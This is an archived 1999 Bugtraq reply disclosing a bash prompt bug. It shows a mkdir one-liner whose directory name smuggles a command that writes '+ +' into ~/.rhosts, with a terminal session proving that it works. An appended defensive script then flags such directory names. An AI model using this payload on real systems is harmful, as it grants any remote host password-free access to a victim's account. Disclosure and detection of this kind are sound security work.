Bugtraq mailing list archives

Re: Bash Bug


From: guy () SPICE ORG IL (Guy Cohen)
Date: Fri, 23 Apr 1999 00:02:57 +0300


At this (Wed, Apr 21, 1999 at 08:39:48PM -0400) day, Andy Church wrote:
.| >If a user creates a directory with a command like
.| >
.| >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
.| >
.|      Just to clarify, this only happens if PS1 (the bash prompt) contains
.| \w or \W _and_ a prompt is displayed containing the bogus directory name.
.| This means unattended shell scripts are safe.  As a workaround, use `pwd`
.| in place of \w.
.|

Unfortunately this is not true. Here is why:
rush:/tmp> bash --version
GNU bash, version 2.03.0(1)-release (i586-pc-linux-gnu)
Copyright 1998 Free Software Foundation, Inc.
rush:/tmp> bash
bash-2.03$ echo $PS1
\s-\v\$
bash-2.03$ cat ~/.rhosts
cat: /export/home/guy/.rhosts: No such file or directory
bash-2.03$ mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
bash-2.03$ cd \\\ \ /
bash-2.03$ cat /export/home/guy/.rhosts\
+ +
sh-2.03$


--
Guy Cohen <guy () spice org il>
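
An added example, not part of the original post: a defensive audit that flags directories whose names carry command-substitution syntax like the mkdir shown above. It goes beyond the post's backtick case to also flag "$(", the other command-substitution form; the function names and the sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post). Function names are hypothetical.

# Print every directory under $1 whose own name contains a backtick or "$(".
find_substitution_dirs() {
    find "${1:-.}" -type d \( -name '*`*' -o -name '*$(*' \) -print
}

# Count matches by emitting one dot per hit, so names that contain
# newlines or other odd characters cannot skew the count.
count_substitution_dirs() {
    find "${1:-.}" -type d \( -name '*`*' -o -name '*$(*' \) \
        -exec printf . \; | wc -c | tr -d ' '
}

# Constructed sample tree. The names are single-quoted, so the shell
# creates them literally and nothing is expanded or executed.
sample=$(mktemp -d)
mkdir -p "$sample/plain/"'n`true`' "$sample/"'a`true`b' "$sample/"'x$(true)y'

find_substitution_dirs "$sample"
echo "suspicious directories: $(count_substitution_dirs "$sample")"

rm -rf "$sample"
```

Run it against world-writable locations such as /tmp, and quote any reported path when inspecting it so the name is never re-evaluated by the shell.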


